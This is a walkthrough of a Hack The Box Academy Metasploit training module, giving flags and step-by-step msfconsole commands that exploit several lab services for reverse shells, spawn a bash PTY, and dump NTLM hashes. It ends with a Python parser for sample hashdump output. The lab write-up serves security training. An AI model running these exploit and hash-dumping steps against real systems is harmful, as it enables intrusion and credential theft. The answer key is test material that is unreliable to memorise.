Using the Metasploit Framework:
Link to challenge: https://academy.hackthebox.com/module/39
(login required)
Class: Tier 0 | Easy | Offensive
Introduction
Introduction to Metasploit:
Question: Which version of Metasploit comes equipped with a GUI interface?
Answer: Metasploit Pro
Method:
Question: What command do you use to interact with the free version of
Metasploit?
Answer: msfconsole
Method: ‘The msfconsole is probably the most popular interface to the Metasploit
Framework (MSF).’
MSF Components
Modules:
Question: Use the Metasploit-Framework to exploit the target with
EternalRomance. Find the flag.txt file on Administrator's desktop and submit
the contents as the answer.
Answer: HTB{MSF-W1nD0w5-3xPL01t4t10n}
Method: first, let's open Metasploit on Pwnbox:
msfconsole
We are in the Metasploit CLI.
In the CLI, let's search for the 'EternalRomance' exploit.
Before we do, some background: the exploit, known as 'MS17-010', exploits a
vulnerability in the Windows SMB server to obtain remote code execution:
search EternalRomance
There are two results: #0 is an exploit module, and #1 is an auxiliary module
(auxiliary modules perform scanning and reconnaissance actions rather than
exploitation):
We go for the exploit, meaning we choose option #0:
use 0
Now we enter 'options' to see which inputs we need to set:
options
We can see which options are required and which are not.
Some of the required options are already filled with default values, such as
'LEAKATTEMPTS' or 'DBGTRACE'; we keep them as they are.
The local port (LPORT) and remote port (RPORT) are also preconfigured, and we
keep them as well. RPORT is preconfigured to port 445, the SMB port.
The local IP address (LHOST, also known as <attacker-IP>) and the remote IP
address (RHOSTS, also known as <target-IP>) are the ones we have to set: to our
own Pwnbox address (<attacker-IP>) and to the provided target machine IP
(<target-IP>).
So let's do just that:
set LHOST <attacker-IP>
set RHOSTS <target-IP>
When we are finished setting the values, it is good practice to re-run
'options' to confirm that all properties are configured with the correct values.
We needed to set the correct attacker-IP and target-IP addresses in order to
obtain a reverse shell that grants us full control of the target machine.
Now that everything is ready, let's run the exploit. We can use:
exploit
or
run
*There is no difference between these two commands.*
We have a shell.
Now, since the session is on a Windows machine, the shell is a 'Meterpreter'
session, generated by the payload. We will treat it like PowerShell (even
though it is not exactly that), and the Meterpreter commands are shown in
sea-blue.
First, let's run:
getuid
to determine our identity:
We are SYSTEM! That means we can get the flag from the Administrator's
Desktop:
cat C:/Users/Administrator/Desktop/flag.txt
*note: Windows paths normally use a backslash '\', but in Meterpreter a
forward slash '/' is often used instead, even though the target is a Windows
machine.
Payloads:
Question: Exploit the Apache Druid service and find the flag.txt file. Submit the
contents of this file as the answer.
Answer: HTB{MSF_Expl01t4t10n}
Method: let's enter Metasploit:
msfconsole
and in the CLI let's look for 'Apache Druid':
search "Apache Druid"
There are several results; we go for #0:
use 0
Now, when we run 'options', we see that we need to set RHOSTS and LHOST
(the 'options' screenshot is omitted in this section and in the following ones,
as it is redundant, unless it is necessary):
set LHOST <attacker-IP>
set RHOSTS <target-IP>
and run the exploit
run
We have a shell! This time it is Linux.
Meterpreter on Linux is a bit awkward, so let's get a proper bash shell:
shell
python3 -c 'import pty; pty.spawn("/bin/bash")'
We have a bash shell.
Let's confirm we are root first:
We are indeed root.
Now, let's look for the flag:
find / -type f -name flag.txt 2>/dev/null
The flag is in '/root/flag.txt'. Let's read it:
cat /root/flag.txt
MSF Sessions
Sessions:
Question: The target has a specific web application running that we can find by
looking into the HTML source code. What is the name of that web application?
Answer: elFinder
Method: let's enter the target machine's IP in the browser URL bar:
We can see the web application's name right in the browser tab.
*In the HTML source code it appears in the 'title' tag, the tag responsible
for the tab's text:
Question: Find the existing exploit in MSF and use it to get a shell on the target.
What is the username of the user you obtained a shell with?
Answer: www-data
Method: let's open Metasploit and look for 'elFinder':
msfconsole
search "elFinder"
We will go for exploit #3:
use 3
Set RHOSTS and LHOST:
set LHOST <attacker-IP>
set RHOSTS <target-IP>
And run:
run
We have a shell!
A simple
getuid
will show us which user we are running as:
Question: The target system has an old version of Sudo running. Find the
relevant exploit and get root access to the target system. Find the flag.txt file
and submit the contents of it as the answer.
Answer: HTB{5e55ion5_4r3_sw33t}
Method: let's put the established Meterpreter session in the background:
background
And let's search for a sudo-related exploit:
search sudo
We will use exploit #29 and point it at our existing Meterpreter session
(session 1):
use 29
set session 1
set LHOST <attacker-IP>
And run:
run
We have a second Meterpreter session. Let's investigate:
We are root!
Now, assuming the flag is located under '/root' as in the previous sections:
*We can always use the technique from the 'Payloads' section to establish a
bash shell and find the flag, but I saw no need to repeat the process here.*
Meterpreter:
Question: Find the existing exploit in MSF and use it to get a shell on the target.
What is the username of the user you obtained a shell with?
Answer: NT AUTHORITY\SYSTEM
Method: time to use a new technique: Nmap from within Metasploit.
We need the 'postgresql' service (the backend of the Metasploit database);
let's check its current status:
sudo service postgresql status
It's inactive; let's start it:
sudo systemctl start postgresql
Now that it is running, let's initialize the msf database:
sudo msfdb init
Now that the msf database is initialized, let's run it:
sudo msfdb run
Now we have a Metasploit console backed by the msf database, which can run an
nmap scan and store its results.
The advantage of running nmap from within Metasploit over regular nmap is that
Metasploit saves the discovered services for further investigation.
(Of course this isn't necessary; we can also look through the nmap results
manually for exploits to test in Metasploit, but it is a nice feature.)
Anyway, let's run the scan:
db_nmap -sV -p- -T5 -A <target-IP>
We don't really need to read the raw nmap output, as all of the results are
saved in the msf database. Let's take a look:
services
There are several services; we go for the IIS service ('Internet Information
Services', basically the Windows equivalent of Apache/nginx). Let's open it in
the browser:
The website is the 'FortiLogger' web logger. Let's see if Metasploit has any
exploits for it:
search FortiLogger
It does, and there is only one, which narrows our choice down:
use 0
Let's set the attacker machine and the target machine:
set RHOSTS <target-IP>
set LHOST <attacker-IP>
run
And we have a shell! Let's see which user we are:
It's SYSTEM!
Question: Retrieve the NTLM password hash for the "htb-student" user. Submit
the hash as the answer.
Answer: cf3a5525ee9414229e66279623ed5c58
Method: in the established Meterpreter session, let's dump the hashes:
hashdump
We look at the fourth line, 'htb-student', and take the last hash field (the
fields are separated by colons; the last hash is the NTLM hash).
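As an added example (not part of the original walkthrough or of Metasploit), a small Python parser for the pwdump-style lines that hashdump prints (user:RID:LM:NTLM:::). It pulls out a named user's NTLM field, the way the answer above is read, and also lists accounts that still store a legacy LM hash, which is what an incident responder would check when deciding which credentials to reset. The sample lines and hash values are constructed for the example, not real output.

```python
import re

# Constructed sample of hashdump output in pwdump format:
#   username:RID:LM_hash:NTLM_hash:::
# All hash values below are made up for this example, not real credentials.
SAMPLE_HASHDUMP = """\
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:fedcba9876543210fedcba9876543210:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
htb-student:1001:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
"""

# Well-known value of the LM field when no LM hash is stored (LM hashing disabled).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
HEX32 = re.compile(r"^[0-9a-f]{32}$")


def parse_hashdump(text):
    """Parse pwdump-style lines into dicts; lines that do not fit the format are skipped."""
    entries = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        parts = line.split(":")
        if len(parts) < 4:
            continue
        user, rid, lm, ntlm = parts[0], parts[1], parts[2].lower(), parts[3].lower()
        # Validate the RID and both 32-hex-character hash fields before accepting the line.
        if not (rid.isdigit() and HEX32.match(lm) and HEX32.match(ntlm)):
            continue
        entries.append({"user": user, "rid": int(rid), "lm": lm, "ntlm": ntlm})
    return entries


def ntlm_for_user(text, username):
    """Return the NTLM hash (last hash field) for username, case-insensitively, or None."""
    for entry in parse_hashdump(text):
        if entry["user"].lower() == username.lower():
            return entry["ntlm"]
    return None


def accounts_with_lm_hash(text):
    """Accounts whose LM field is not the empty-LM constant: a weakness worth flagging."""
    return [e["user"] for e in parse_hashdump(text) if e["lm"] != EMPTY_LM]
```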